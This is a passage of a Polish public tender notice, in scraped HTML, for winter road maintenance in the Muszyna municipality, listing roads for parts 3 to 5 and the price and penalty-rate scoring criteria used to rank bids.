class="normal">A.	Kryteria oceny ofert i ich znaczenie<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami analogicznie dla wszystkich zadań: <br/>Nr	Nazwa kryterium	Waga<br/>1.	Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę.	60 pkt<br/>2.	Wysokości kary umownej –	jeśli Wykonawca nie prowadzi prac zgodnie z przyjętym standardem i wymogami określonymi w niniejszej umowie lub w ogóle nie rozpoczął lub zaprzestał realizacji usługi ZUD (w tym na wezwanie Zamawiającego) Zamawiający obciąży Wykonawcę karą umowną stanowiącą równowartość ……………% (zgodnie ze złożoną ofertą) jego dziennego wynagrodzenia przysługującego mu za właściwe utrzymanie drogi (której dotyczy zwłoka w realizacji usługi, niewykonanie lub nienależyte wykonanie usługi), za każdy przypadek realizacji zamówienia niezgodnie z wymogami standardu oraz niniejszej umowy, o której mowa we wzorze umowy § 14 ust 1 pkt. 1).	<br/>40 pkt<br/><br/>B.	Sposób oceny ofert w oparciu o kryteria<br/>1.	Ocenie poddane zostaną oferty nie podlegające odrzuceniu.<br/>2.	Zamawiający dokona oceny ofert w zakresie kryterium na następujących zasadach:<br/>Nr kryterium	Wzór<br/>1.<br/>Cena	Liczba punktów = (Cmin/Cof) * 60, gdzie:<br/>Cmin – najniższa cena spośród wszystkich ofert<br/>Cof – cena podana w ofercie<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/>2.<br/>Wysokość kary umownej	Sposób oceny:<br/>Punktacja za wysokość kary minimum 0,1% maksimum 0,5% będzie obliczana na podstawie wzoru:<br/>K = 100 * Kr/Kn * 0,40, gdzie:<br/>K – łączna liczba punktów otrzymanych za kryterium wysokość kary<br/>Kr – wysokość kary rozpatrywanej oferty<br/>Kn – najwyższa zaoferowana wysokość kary<br/>0,40 – waga kryterium<br/>Maksymalna liczba 40 punktów. Zostanie przyznana za udzielenie 0,5% wysokość kary umownej na wykonany przedmiot zamówienia. W przypadku zaoferowania kary umownej wyższej niż 0,5% do oceny kryterium będzie brana kara w wysokości 0,5%. Minimalna wysokość kary umownej – 0,1%. Zaoferowanie niższej wysokość kary umownej spowoduje odrzucenie oferty. <br/>3.	Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+K, gdzie:<br/>P – ostateczna liczba punktów<br/>C – liczba punktów otrzymana za kryterium cena<br/>K – liczba punktów otrzymana za kryterium wysokość kary umownej.<br/>4.	Oferta złożona przez Wykonawcę może otrzymać łącznie 100 pkt.<br/>5.	Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyska największą liczbę punktów przyznanych w ramach ustalonych kryteriów.<br/>6.	W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>7.	Zamawiający zastosuje zaokrąglenie do każdego wyniku do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokości kary umownej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zakres usług obejmuje m.in.:<br/>1)	Kompleksowe zimowe utrzymanie dróg polegające na zapewnieniu przejezdności oraz ograniczeniu zakłóceń płynności ruchu drogowego wywołanych opadami śniegu, deszczu ze śniegiem, marznącej mżawki lub śliskością zimową jezdni, poprzez usuwanie śniegu, zapobieganie powstawaniu i likwidowanie śliskości zimowej, usunięciu śniegu. <br/>2)	Posprzątanie po zimowym utrzymaniu na drogach. <br/>3)	Szczegółowy opis przedmiotu zamówienia - warunki wykonania zostały ujęte w Specyfikacji Technicznej stanowiącej załącznik nr 1 do SWZ.<br/>4)	Wykonawca jest zobowiązany do oceny sytuacji na ulicach i odpowiedniego reagowania poprzez wysyłanie stosownych jednostek.<br/>5)	Za przejezdność ulic odpowiada Wykonawca.<br/>6)	Wykonawca zobowiązany jest ubezpieczyć wykonywane prace i najpóźniej w dniu zawarcia umowy przedłożyć Zamawiającemu uwierzytelnioną kopię polisy ubezpieczeniowej z wyszczególnieniem działalności utrzymania zimowego dróg i odpowiedzialności cywilnej wobec osób trzecich (za szkody majątkowe i osobowe), bez ograniczenia liczby zdarzeń na okres obowiązywania umowy.<br/>7)	Wymagania w zakresie łączności, które Wykonawca powinien zapewnić na dzień podpisania umowy:<br/>	całodobowa łączność z dyspozytorem przez telefon stacjonarny z faksem, plus telefon komórkowy,<br/>	łączność za pomocą tel. komórkowych; każda sprzętowa jednostka utrzymaniowa musi być wyposażona w telefon komórkowy (jeden numer na jednostkę).<br/>2.	Miejsce realizacji usługi: teren Miasta i Gminy Uzdrowiskowej Muszyna.<br/>3.	Zamawiający dopuszcza składanie ofert częściowych na poszczególne zadania:<br/>Zadanie nr	Nr drogi / nr działki	Nazwa drogi	Standardy utrzymania	Razem km<br/> <br/> <br/>1	2	3	4	5<br/>3	292890K	Andrzejówka-Wieś	V	1,83<br/>	292888K	Andrzejówka „Ługi”	V	1,4<br/>	292890K	Andrzejówka – dz. nr 346 VI	0,4<br/>	292890K	Andrzejówka – dz. nr 206 VI	0,8<br/>	292890K	Andrzejówka – dz. nr 215 VI	0,6<br/>	292890K	Andrzejówka – dz. nr 300 (Kościół)	VI	0,2<br/>	292889K	Andrzejówka - dz. nr 358 VI	0,2<br/>	292888K	Andrzejówka - „Ługi” - Ośrodek dz. nr 148/1	VI	0,2<br/>	dz. nr 346	Andrzejówka VI	0,1<br/>	dz.nr 292/2, dz.nr 292/3	Andrzejówka VI	0,2<br/>	dz. nr 305/7	Andrzejówka VI	0,15<br/>	dz. nr 284/4	Andrzejówka VI	0,1<br/>	dz. nr 333	Andrzejówka – Parking Szkoła	VI	0,15<br/>	dz.nr.364/2, dz.nr.339/1	Andrzejówka VI	0,07<br/>	6,4<br/>Szczegółowy opis przedmiotu zamówienia został zawarty w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. W ramach realizacji niniejszego zamówienia Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ust. 1 Pzp, w zakresie, którego<br/>Zamawiający przewiduje zwiększenie ilości dni świadczenia usługi w ilości nie większej niż<br/>50% zamówienia podstawowego dla każdego odcinka drogi objętego umową.<br/>2. Zamawiający w ramach przewidywanego prawa opcji zastrzega możliwość zwiększenia<br/>ilości zakresu usług w ramach niniejszej umowy ponad zakres podstawowy zamówienia.<br/>Zamawiający podejmie decyzję co do możliwości i woli skorzystania z zastrzeżonego<br/>prawa opcji, zgodnie z zapotrzebowaniem i posiadanymi<br/>możliwościami finansowymi. Zastrzega się, iż zakres opcjonalny zamówienia objęty<br/>prawem opcji nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego<br/>zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a przewidywany<br/>zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Realizacja<br/>(uruchomienie) prawa opcji (zakresu opcjonalnego zamówienia) nie stanowi zmiany<br/>warunków niniejszej umowy i nie wymaga zawarcia aneksu do niniejszej umowy.<br/>W przypadku skorzystania przez Zamawiającego z prawa opcji uruchomiony w tym trybie<br/>zakres opcjonalny ma być realizowany w sposób analogiczny, jak zakres podstawowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">A.	Kryteria oceny ofert i ich znaczenie<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami analogicznie dla wszystkich zadań: <br/>Nr	Nazwa kryterium	Waga<br/>1.	Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę.	60 pkt<br/>2.	Wysokości kary umownej –	jeśli Wykonawca nie prowadzi prac zgodnie z przyjętym standardem i wymogami określonymi w niniejszej umowie lub w ogóle nie rozpoczął lub zaprzestał realizacji usługi ZUD (w tym na wezwanie Zamawiającego) Zamawiający obciąży Wykonawcę karą umowną stanowiącą równowartość ……………% (zgodnie ze złożoną ofertą) jego dziennego wynagrodzenia przysługującego mu za właściwe utrzymanie drogi (której dotyczy zwłoka w realizacji usługi, niewykonanie lub nienależyte wykonanie usługi), za każdy przypadek realizacji zamówienia niezgodnie z wymogami standardu oraz niniejszej umowy, o której mowa we wzorze umowy § 14 ust 1 pkt. 1).	<br/>40 pkt<br/><br/>B.	Sposób oceny ofert w oparciu o kryteria<br/>1.	Ocenie poddane zostaną oferty nie podlegające odrzuceniu.<br/>2.	Zamawiający dokona oceny ofert w zakresie kryterium na następujących zasadach:<br/>Nr kryterium	Wzór<br/>1.<br/>Cena	Liczba punktów = (Cmin/Cof) * 60, gdzie:<br/>Cmin – najniższa cena spośród wszystkich ofert<br/>Cof – cena podana w ofercie<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/>2.<br/>Wysokość kary umownej	Sposób oceny:<br/>Punktacja za wysokość kary minimum 0,1% maksimum 0,5% będzie obliczana na podstawie wzoru:<br/>K = 100 * Kr/Kn * 0,40, gdzie:<br/>K – łączna liczba punktów otrzymanych za kryterium wysokość kary<br/>Kr – wysokość kary rozpatrywanej oferty<br/>Kn – najwyższa zaoferowana wysokość kary<br/>0,40 – waga kryterium<br/>Maksymalna liczba 40 punktów. Zostanie przyznana za udzielenie 0,5% wysokość kary umownej na wykonany przedmiot zamówienia. W przypadku zaoferowania kary umownej wyższej niż 0,5% do oceny kryterium będzie brana kara w wysokości 0,5%. Minimalna wysokość kary umownej – 0,1%. Zaoferowanie niższej wysokość kary umownej spowoduje odrzucenie oferty. <br/>3.	Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+K, gdzie:<br/>P – ostateczna liczba punktów<br/>C – liczba punktów otrzymana za kryterium cena<br/>K – liczba punktów otrzymana za kryterium wysokość kary umownej.<br/>4.	Oferta złożona przez Wykonawcę może otrzymać łącznie 100 pkt.<br/>5.	Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyska największą liczbę punktów przyznanych w ramach ustalonych kryteriów.<br/>6.	W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>7.	Zamawiający zastosuje zaokrąglenie do każdego wyniku do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokości kary umownej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zakres usług obejmuje m.in.:<br/>1)	Kompleksowe zimowe utrzymanie dróg polegające na zapewnieniu przejezdności oraz ograniczeniu zakłóceń płynności ruchu drogowego wywołanych opadami śniegu, deszczu ze śniegiem, marznącej mżawki lub śliskością zimową jezdni, poprzez usuwanie śniegu, zapobieganie powstawaniu i likwidowanie śliskości zimowej, usunięciu śniegu. <br/>2)	Posprzątanie po zimowym utrzymaniu na drogach. <br/>3)	Szczegółowy opis przedmiotu zamówienia - warunki wykonania zostały ujęte w Specyfikacji Technicznej stanowiącej załącznik nr 1 do SWZ.<br/>4)	Wykonawca jest zobowiązany do oceny sytuacji na ulicach i odpowiedniego reagowania poprzez wysyłanie stosownych jednostek.<br/>5)	Za przejezdność ulic odpowiada Wykonawca.<br/>6)	Wykonawca zobowiązany jest ubezpieczyć wykonywane prace i najpóźniej w dniu zawarcia umowy przedłożyć Zamawiającemu uwierzytelnioną kopię polisy ubezpieczeniowej z wyszczególnieniem działalności utrzymania zimowego dróg i odpowiedzialności cywilnej wobec osób trzecich (za szkody majątkowe i osobowe), bez ograniczenia liczby zdarzeń na okres obowiązywania umowy.<br/>7)	Wymagania w zakresie łączności, które Wykonawca powinien zapewnić na dzień podpisania umowy:<br/>	całodobowa łączność z dyspozytorem przez telefon stacjonarny z faksem, plus telefon komórkowy,<br/>	łączność za pomocą tel. komórkowych; każda sprzętowa jednostka utrzymaniowa musi być wyposażona w telefon komórkowy (jeden numer na jednostkę).<br/>2.	Miejsce realizacji usługi: teren Miasta i Gminy Uzdrowiskowej Muszyna.<br/>3.	Zamawiający dopuszcza składanie ofert częściowych na poszczególne zadania:<br/>Zadanie nr	Nr drogi / nr działki	Nazwa drogi	Standardy utrzymania	Razem km<br/> <br/> <br/>1	2	3	4	5<br/>4	dz. nr 163/1	Leluchów – Kościół	V	0,15<br/>	dz. nr 113	Leluchów – przystanek autobusowy	V	0,2<br/> Leluchów – Parking	VI	0,2<br/>	292934K 292935K	Leluchów – Dubne	IV	5,1<br/>	5,65<br/>Szczegółowy opis przedmiotu zamówienia został zawarty w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. W ramach realizacji niniejszego zamówienia Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ust. 1 Pzp, w zakresie, którego<br/>Zamawiający przewiduje zwiększenie ilości dni świadczenia usługi w ilości nie większej niż<br/>50% zamówienia podstawowego dla każdego odcinka drogi objętego umową.<br/>2. Zamawiający w ramach przewidywanego prawa opcji zastrzega możliwość zwiększenia<br/>ilości zakresu usług w ramach niniejszej umowy ponad zakres podstawowy zamówienia.<br/>Zamawiający podejmie decyzję co do możliwości i woli skorzystania z zastrzeżonego<br/>prawa opcji, zgodnie z zapotrzebowaniem i posiadanymi<br/>możliwościami finansowymi. Zastrzega się, iż zakres opcjonalny zamówienia objęty<br/>prawem opcji nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego<br/>zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a przewidywany<br/>zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Realizacja<br/>(uruchomienie) prawa opcji (zakresu opcjonalnego zamówienia) nie stanowi zmiany<br/>warunków niniejszej umowy i nie wymaga zawarcia aneksu do niniejszej umowy.<br/>W przypadku skorzystania przez Zamawiającego z prawa opcji uruchomiony w tym trybie<br/>zakres opcjonalny ma być realizowany w sposób analogiczny, jak zakres podstawowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">A.	Kryteria oceny ofert i ich znaczenie<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami analogicznie dla wszystkich zadań: <br/>Nr	Nazwa kryterium	Waga<br/>1.	Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę.	60 pkt<br/>2.	Wysokości kary umownej –	jeśli Wykonawca nie prowadzi prac zgodnie z przyjętym standardem i wymogami określonymi w niniejszej umowie lub w ogóle nie rozpoczął lub zaprzestał realizacji usługi ZUD (w tym na wezwanie Zamawiającego) Zamawiający obciąży Wykonawcę karą umowną stanowiącą równowartość ……………% (zgodnie ze złożoną ofertą) jego dziennego wynagrodzenia przysługującego mu za właściwe utrzymanie drogi (której dotyczy zwłoka w realizacji usługi, niewykonanie lub nienależyte wykonanie usługi), za każdy przypadek realizacji zamówienia niezgodnie z wymogami standardu oraz niniejszej umowy, o której mowa we wzorze umowy § 14 ust 1 pkt. 1).	<br/>40 pkt<br/><br/>B.	Sposób oceny ofert w oparciu o kryteria<br/>1.	Ocenie poddane zostaną oferty nie podlegające odrzuceniu.<br/>2.	Zamawiający dokona oceny ofert w zakresie kryterium na następujących zasadach:<br/>Nr kryterium	Wzór<br/>1.<br/>Cena	Liczba punktów = (Cmin/Cof) * 60, gdzie:<br/>Cmin – najniższa cena spośród wszystkich ofert<br/>Cof – cena podana w ofercie<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/>2.<br/>Wysokość kary umownej	Sposób oceny:<br/>Punktacja za wysokość kary minimum 0,1% maksimum 0,5% będzie obliczana na podstawie wzoru:<br/>K = 100 * Kr/Kn * 0,40, gdzie:<br/>K – łączna liczba punktów otrzymanych za kryterium wysokość kary<br/>Kr – wysokość kary rozpatrywanej oferty<br/>Kn – najwyższa zaoferowana wysokość kary<br/>0,40 – waga kryterium<br/>Maksymalna liczba 40 punktów. Zostanie przyznana za udzielenie 0,5% wysokość kary umownej na wykonany przedmiot zamówienia. W przypadku zaoferowania kary umownej wyższej niż 0,5% do oceny kryterium będzie brana kara w wysokości 0,5%. Minimalna wysokość kary umownej – 0,1%. Zaoferowanie niższej wysokość kary umownej spowoduje odrzucenie oferty. <br/>3.	Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+K, gdzie:<br/>P – ostateczna liczba punktów<br/>C – liczba punktów otrzymana za kryterium cena<br/>K – liczba punktów otrzymana za kryterium wysokość kary umownej.<br/>4.	Oferta złożona przez Wykonawcę może otrzymać łącznie 100 pkt.<br/>5.	Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyska największą liczbę punktów przyznanych w ramach ustalonych kryteriów.<br/>6.	W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>7.	Zamawiający zastosuje zaokrąglenie do każdego wyniku do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokości kary umownej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zakres usług obejmuje m.in.:<br/>1)	Kompleksowe zimowe utrzymanie dróg polegające na zapewnieniu przejezdności oraz ograniczeniu zakłóceń płynności ruchu drogowego wywołanych opadami śniegu, deszczu ze śniegiem, marznącej mżawki lub śliskością zimową jezdni, poprzez usuwanie śniegu, zapobieganie powstawaniu i likwidowanie śliskości zimowej, usunięciu śniegu. <br/>2)	Posprzątanie po zimowym utrzymaniu na drogach. <br/>3)	Szczegółowy opis przedmiotu zamówienia - warunki wykonania zostały ujęte w Specyfikacji Technicznej stanowiącej załącznik nr 1 do SWZ.<br/>4)	Wykonawca jest zobowiązany do oceny sytuacji na ulicach i odpowiedniego reagowania poprzez wysyłanie stosownych jednostek.<br/>5)	Za przejezdność ulic odpowiada Wykonawca.<br/>6)	Wykonawca zobowiązany jest ubezpieczyć wykonywane prace i najpóźniej w dniu zawarcia umowy przedłożyć Zamawiającemu uwierzytelnioną kopię polisy ubezpieczeniowej z wyszczególnieniem działalności utrzymania zimowego dróg i odpowiedzialności cywilnej wobec osób trzecich (za szkody majątkowe i osobowe), bez ograniczenia liczby zdarzeń na okres obowiązywania umowy.<br/>7)	Wymagania w zakresie łączności, które Wykonawca powinien zapewnić na dzień podpisania umowy:<br/>	całodobowa łączność z dyspozytorem przez telefon stacjonarny z faksem, plus telefon komórkowy,<br/>	łączność za pomocą tel. komórkowych; każda sprzętowa jednostka utrzymaniowa musi być wyposażona w telefon komórkowy (jeden numer na jednostkę).<br/>2.	Miejsce realizacji usługi: teren Miasta i Gminy Uzdrowiskowej Muszyna.<br/>3.	Zamawiający dopuszcza składanie ofert częściowych na poszczególne zadania:<br/>Zadanie nr	Nr drogi / nr działki	Nazwa drogi	Standardy utrzymania	Razem km<br/> <br/> <br/>1	2	3	4	5<br/>5	292891K	Żegiestów „Łopata”	V	1,5<br/>	dz. nr 123/3, dz. nr.123/4	Żegiestów VI	0,08<br/> dz. nr 64, dz. nr 46	Żegiestów Łopata VI	0,32<br/>	1,9<br/><br/>Szczegółowy opis przedmiotu zamówienia został zawarty w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90611000-3 - Usługi sprzątania ulic</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. W ramach realizacji niniejszego zamówienia Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ust. 1 Pzp, w zakresie, którego<br/>Zamawiający przewiduje zwiększenie ilości dni świadczenia usługi w ilości nie większej niż<br/>50% zamówienia podstawowego dla każdego odcinka drogi objętego umową.<br/>2. Zamawiający w ramach przewidywanego prawa opcji zastrzega możliwość zwiększenia<br/>ilości zakresu usług w ramach niniejszej umowy ponad zakres podstawowy zamówienia.<br/>Zamawiający podejmie decyzję co do możliwości i woli skorzystania z zastrzeżonego<br/>prawa opcji, zgodnie z zapotrzebowaniem i posiadanymi<br/>możliwościami finansowymi. Zastrzega się, iż zakres opcjonalny zamówienia objęty<br/>prawem opcji nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego<br/>zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a przewidywany<br/>zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Realizacja<br/>(uruchomienie) prawa opcji (zakresu opcjonalnego zamówienia) nie stanowi zmiany<br/>warunków niniejszej umowy i nie wymaga zawarcia aneksu do niniejszej umowy.<br/>W przypadku skorzystania przez Zamawiającego z prawa opcji uruchomiony w tym trybie<br/>zakres opcjonalny ma być realizowany w sposób analogiczny, jak zakres podstawowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">A.	Kryteria oceny ofert i ich znaczenie<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami analogicznie dla wszystkich zadań: <br/>Nr	Nazwa kryterium	Waga<br/>1.	Cena oferty (z podatkiem VAT) na którą powinny się składać wszelkie koszty ponoszone przez Wykonawcę.	60 pkt<br/>2.	Wysokości kary umownej –	jeśli Wykonawca nie prowadzi prac zgodnie z przyjętym standardem i wymogami określonymi w niniejszej umowie lub w ogóle nie rozpoczął lub zaprzestał realizacji usługi ZUD (w tym na wezwanie Zamawiającego) Zamawiający obciąży Wykonawcę karą umowną stanowiącą równowartość ……………% (zgodnie ze złożoną ofertą) jego dziennego wynagrodzenia przysługującego mu za właściwe utrzymanie drogi (której dotyczy zwłoka w realizacji usługi, niewykonanie lub nienależyte wykonanie usługi), za każdy przypadek realizacji zamówienia niezgodnie z wymogami standardu oraz niniejszej umowy, o której mowa we wzorze umowy § 14 ust 1 pkt. 1).	<br/>40 pkt<br/><br/>B.	Sposób oceny ofert w oparciu o kryteria<br/>1.	Ocenie poddane zostaną oferty nie podlegające odrzuceniu.<br/>2.	Zamawiający dokona oceny ofert w zakresie kryterium na następujących zasadach:<br/>Nr kryterium	Wzór<br/>1.<br/>Cena	Liczba punktów = (Cmin/Cof) * 60, gdzie:<br/>Cmin – najniższa cena spośród wszystkich ofert<br/>Cof – cena podana w ofercie<br/>Maksymalną ilość punktów w obrębie kryterium otrzyma oferta z najniższą ceną.<br/>2.<br/>Wysokość kary umownej	Sposób oceny:<br/>Punktacja za wysokość kary minimum 0,1% maksimum 0,5% będzie obliczana na podstawie wzoru:<br/>K = 100 * Kr/Kn * 0,40, gdzie:<br/>K – łączna liczba punktów otrzymanych za kryterium wysokość kary<br/>Kr – wysokość kary rozpatrywanej oferty<br/>Kn – najwyższa zaoferowana wysokość kary<br/>0,40 – waga kryterium<br/>Maksymalna liczba 40 punktów. Zostanie przyznana za udzielenie 0,5% wysokość kary umownej na wykonany przedmiot zamówienia. W przypadku zaoferowania kary umownej wyższej niż 0,5% do oceny kryterium będzie brana kara w wysokości 0,5%. Minimalna wysokość kary umownej – 0,1%. Zaoferowanie niższej wysokość kary umownej spowoduje odrzucenie oferty. <br/>3.	Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+K, gdzie:<br/>P – ostateczna liczba punktów<br/>C – liczba punktów otrzymana za kryterium cena<br/>K – liczba punktów otrzymana za kryterium wysokość kary umownej.<br/>4.	Oferta złożona przez Wykonawcę może otrzymać łącznie 100 pkt.<br/>5.	Zamawiający za najkorzystniejszą uzna ofertę, która nie podlega odrzuceniu oraz uzyska największą liczbę punktów przyznanych w ramach ustalonych kryteriów.<br/>6.	W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>7.	Zamawiający zastosuje zaokrąglenie do każdego wyniku do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) 